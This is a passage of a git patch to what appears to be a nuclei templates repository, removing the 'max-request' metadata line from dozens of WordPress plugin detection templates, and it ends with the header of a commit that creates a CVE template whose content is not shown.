--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 208ff388432d062396936c48707c1c89dac184bc Mon Sep 17 00:00:00 2001
From: GwanYeong Kim 
Date: Sat, 30 Sep 2023 13:15:00 +0900
Subject: [PATCH 0621/1090] Create CVE-2023-30013.yaml

